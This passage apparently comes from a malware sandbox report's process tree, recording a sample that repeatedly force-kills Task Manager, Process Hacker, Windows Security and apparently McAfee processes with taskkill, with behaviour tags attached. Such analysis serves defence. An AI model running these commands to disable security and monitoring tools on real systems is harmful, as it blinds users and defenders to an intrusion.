- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4868
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3652
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2312
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:1068
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5636
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5840
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1616
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2944
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5580
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5600
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:4316
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1812
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3544
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:6056
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5228
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5292
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3880
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5584
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:464
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5992
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5800
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2776
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5440
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1604
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3876
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6108
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2152
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5908
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1888
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2180
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6136
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5216
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:1032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:2592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:3252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1124
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:1668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4396
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2344
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1512
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5304
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5112
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Kills process with taskkill
  PID:5784
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:4660
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5328
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  - Kills process with taskkill
  PID:5644
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5376
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6072
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5088
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4676
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:6048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:2412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4708
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5340
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5832
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:516
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5620
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2344
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5580
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:1892
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3420
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5900
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6140
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5172
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:4940
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:6084
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5996
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5884
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5128
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:6024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:3300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5704
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:3252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:624
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5188
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6000
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:2476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:1432
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5552
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:4588
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:1032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5612
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5292
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5836
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:6100
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:2872
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5484
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:4384
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:4688
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:5904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5276
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:3024
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1148
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:848
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:8
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:6132
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:3672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:2300
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5476
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:6036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:4448
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5496
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:2592
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5368
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5232
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5276
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5976
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:6004
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:5244
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:2296
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3672
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:1492
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:716
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:1156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:6128
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5624
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:3812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:5336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5856
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2336
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:5904
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  - Kills process with taskkill
  PID:5200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5816
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:5860
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:4156
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5640
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:3488
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5812
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:5556
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM servicehost.exe
  2⤵
  PID:5016
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ModuleCoreService.exe
  2⤵
  PID:4696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-web-view.exe
  2⤵
  PID:5144
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1036
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-neo-host.exe
  2⤵
  PID:2184
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mc-fw-host.exe
  2⤵
  PID:1808
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM mcapexe.exe
  2⤵
  PID:3032
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5220
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  - Kills process with taskkill
  PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:3628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM SecHealthUI.exe
  2⤵
  PID:5696
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM Taskmgr.exe
  2⤵
  PID:628
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM ProcessHacker.exe
  2⤵
  PID:5204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /F /IM uihost.exe
  2⤵
  PID:4560
